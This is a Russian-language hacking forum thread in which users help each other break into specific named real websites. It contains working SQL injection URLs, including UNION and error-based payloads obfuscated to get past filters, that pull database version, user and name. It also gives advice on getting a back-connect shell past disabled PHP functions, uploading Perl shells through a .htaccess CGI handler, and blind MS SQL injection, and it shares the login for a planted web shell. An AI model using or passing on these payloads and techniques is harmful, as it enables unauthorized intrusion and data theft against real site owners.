есть веб шелл на сервере с Code: Disabled PHP Functions: show_source, system, shell_exec, passthru, exec, shell, symlink, popen, proc_open можно ли запустить бекконект с таким набором?
Нашёл SQLInj: Code: http://strob.od.ua/product.php?pod_kod=60000&id=180+and+1=0+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15 Code: version() 5.0.67-log user() [email protected] database() strob_product Как теперь можно залить шелл(не через админку)? Заранее спасибо, в этой теме 0 почти.
123 мдя, brutos ну и где там все условия чтоб лить через иньецию? нет 2-order inj, mg=on, прав нет у юзверя. мб знаете какие то "особые условия" brutos , ноу-хау, поделитесь? perl-скрипт https://forum.antichat.ru/showthread.php?t=198119 ок тут тут пашкеле медаль. )
Strilo4ka, я его сайт не смотрел. Дал ссылку, где он мог бы подробно, на примерах, прочитать про возможность заливки шелла через sql inj, не более.
залить perl скрипт (а лучше perl шел), попробовать запустить его через web. также нужно попробовать создать .htaccess Options +ExecCGI AddHandler cgi-script pl у меня иногда прокатывало, особенно не на серьезных серверах/хостингах.
Привет, подскажите как узнать имя базы при слепой MS SQL инъекции (выводится только 1 или 0 при верном или не верном запросе) И если только брутить то подскажите скрипт или программу для mssql
очень проблематично найти MaxPatrol. может посоветуйте альтернативу ? Acunetix Web Vulnerability Scanner 6 - пойдет? Просто там каскадное меню и не знаю на сколько правильно "поймет" сканер..
Спасибо за прогу. выбил туда этот сайт. На таблице Request History все время 44:** -200 - 8311 не знаю что это значит. снял лог, а там только заголовки на всю страницу: Code: GET / HTTP/1.1 Accept:*/* User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host:[I]site.aa.su[/I] Скажу еще, что сайт попасть можно только лишь после авторизации.
http://ru.akella.com/Game.aspx?id=1%27 че дальше, кто подскажет? не имел никогда дело с aspx-движками.
Всем привет! Можно ли с помощью залитого на сайт swf создать/переименовать файл? (без обращения его например к php) Надеюсь мой ход мысли понятен!? ...хотя думается мне, ответ будет отрицательным.
DrakonHaSh у меня браузер предлагает его сохранить( шеллы и на питоне перле пробовал хренова дело,может кто знает как использовать альтернативные функции? IMMORTAL_S swf же в браузере выполняется нечего не сделаешь,ищи другие пути...
Не могу разобраться с шелом, http://morefotok.net/upload/shell.php он читается как обычный текст, логин wall66 пароль 12345 Думал, что-то с .htaccess замутить-не вышло, не дает создать такой файл. Фильтруется имя файла при закачивании файла+ при переименование тоже выдает ошибку. Кто, что может посоветовать?
http://www.xvideo.ru/catalog.php?product=588+order+by+1-- помогите раскрутить инъекцию на union select никакой реакции
Axel_Ustus: http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat((SeLEcT+concat_ws(0x3a,version(),user(),database())),rAnD(0)|0)+hAvInG+miN(0)*/
Axel_Ustus: Конечно, тебе дали решение задачки, но если тебе вдруг интересно не получение доступа к бд, а причина, по которой не работает union, то ответ таков: 1) При запросе "order by 2" нам возвращается sql запрос: Code: select categories_id from t_products_to_categories where product_id = 589 order by 2-- И мы видим, что запрашивается одно поле 2) Закроем запрос Code: http://www.xvideo.ru/catalog.php?product=589 -- 1 3) Попробуем написать union select после закрытия: Code: http://www.xvideo.ru/catalog.php?product=589 -- 1 union select Мы видим ошибку, следовательно union select блочится 4) Code: http://www.xvideo.ru/catalog.php?product=589 -- 1 union(select Ошибки нет 5) Code: http://www.xvideo.ru/catalog.php?product=589 union(select 1) -- 1 И запрос, который нам вернулся: Code: select name,description from t_products_items where products_id = 589 union(select 1) -- 1 order by order_id LIMIT 2 Из этого следует, что тут несколько запросов, и union работать не будет)
